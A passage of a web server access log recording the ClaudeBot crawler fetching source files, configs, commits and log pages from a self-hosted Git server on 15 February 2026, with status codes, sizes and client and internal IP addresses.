Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/vite.config.ts" [Client 216.73.216.188] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/launch.json" [Client 216.73.216.188] [Length 452] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/global.json" [Client 216.73.216.188] [Length 9874] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/keys.json?display=rendered" [Client 216.73.216.188] [Length 10924] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/models.py?display=rendered" [Client 216.73.216.188] [Length 10940] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/letsencrypt/renewal" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/mail_contact.py?display=source" [Client 216.73.216.188] [Length 16091] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3.12" [Client 216.73.216.188] [Length 9911] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/start.sh" [Client 216.73.216.188] [Length 3718] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_error.log?display=rendered" [Client 216.73.216.188] [Length 10970] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Footer.tsx" [Client 216.73.216.188] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx.conf" [Client 216.73.216.188] [Length 10122] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/letsencrypt/renewal" -[15/Feb/2026:09:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/requirements.txt" [Client 216.73.216.188] [Length 1424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Services.tsx" [Client 216.73.216.188] [Length 9850] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/About.tsx" [Client 216.73.216.188] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal" [Client 216.73.216.188] [Length 10714] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3.12" [Client 216.73.216.188] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/QUICKSTART.md?display=source" [Client 216.73.216.188] [Length 15439] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.2" [Client 216.73.216.188] [Length 36011] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Hero.tsx" [Client 216.73.216.188] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 9855] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup" [Client 216.73.216.188] [Length 11445] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/update_status.py?display=rendered" [Client 216.73.216.188] [Length 10811] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:49 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/.env.local" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/4.conf?display=source" [Client 216.73.216.188] [Length 12754] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/update_status.py?display=rendered" [Client 216.73.216.188] [Length 10838] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html?display=source" [Client 216.73.216.188] [Length 21794] [Gzip 6.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.2" [Client 216.73.216.188] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup" [Client 216.73.216.188] [Length 11410] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/settings.json?display=source" [Client 216.73.216.188] [Length 11455] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" [Client 216.73.216.188] [Length 9913] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/README.md" [Client 216.73.216.188] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js/app.js" [Client 216.73.216.188] [Length 9921] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?style=split&whitespace=ignore-change" [Client 216.73.216.188] [Length 68067] [Gzip 10.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=docker-compose.yml" [Client 216.73.216.188] [Length 24698] [Gzip 4.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python?display=rendered" [Client 216.73.216.188] [Length 10992] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 9783] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js/app.js" [Client 216.73.216.188] [Length 11073] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log" [Client 216.73.216.188] [Length 27720] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" [Client 216.73.216.188] [Length 14174] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx.conf" [Client 216.73.216.188] [Length 796] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_access.log?display=source" [Client 216.73.216.188] [Length 16357] [Gzip 6.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=docker-compose.yml" [Client 216.73.216.188] [Length 23776] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/global.json" [Client 216.73.216.188] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_access.log?display=source" [Client 216.73.216.188] [Length 23879] [Gzip 9.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log" [Client 216.73.216.188] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_access.log?display=rendered" [Client 216.73.216.188] [Length 10977] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/README.md" [Client 216.73.216.188] [Length 3505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Services.tsx" [Client 216.73.216.188] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_access.log?display=source" [Client 216.73.216.188] [Length 12169] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 828] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 12175] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/3.conf?display=source" [Client 216.73.216.188] [Length 13646] [Gzip 4.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/archive/7e5f452449b5385fa46a3a589ed6aac00a02734a.bundle" [Client 216.73.216.188] [Length 12778013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html?display=source" [Client 216.73.216.188] [Length 22737] [Gzip 7.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_error.log?display=rendered" [Client 216.73.216.188] [Length 10937] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_error.log?display=rendered" [Client 216.73.216.188] [Length 10972] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_error.log?display=rendered" [Client 216.73.216.188] [Length 10972] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/requirements.txt" [Client 216.73.216.188] [Length 262] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/status.json?display=source" [Client 216.73.216.188] [Length 11065] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?style=split&whitespace=ignore-all" [Client 216.73.216.188] [Length 68068] [Gzip 10.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" [Client 216.73.216.188] [Length 9816] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.5?display=source" [Client 216.73.216.188] [Length 33415] [Gzip 6.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md?display=rendered" [Client 216.73.216.188] [Length 16053] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/docker-compose.yml?display=source" [Client 216.73.216.188] [Length 11888] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/favicon.ico" [Client 216.73.216.188] [Length 10824] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/vite.config.ts" [Client 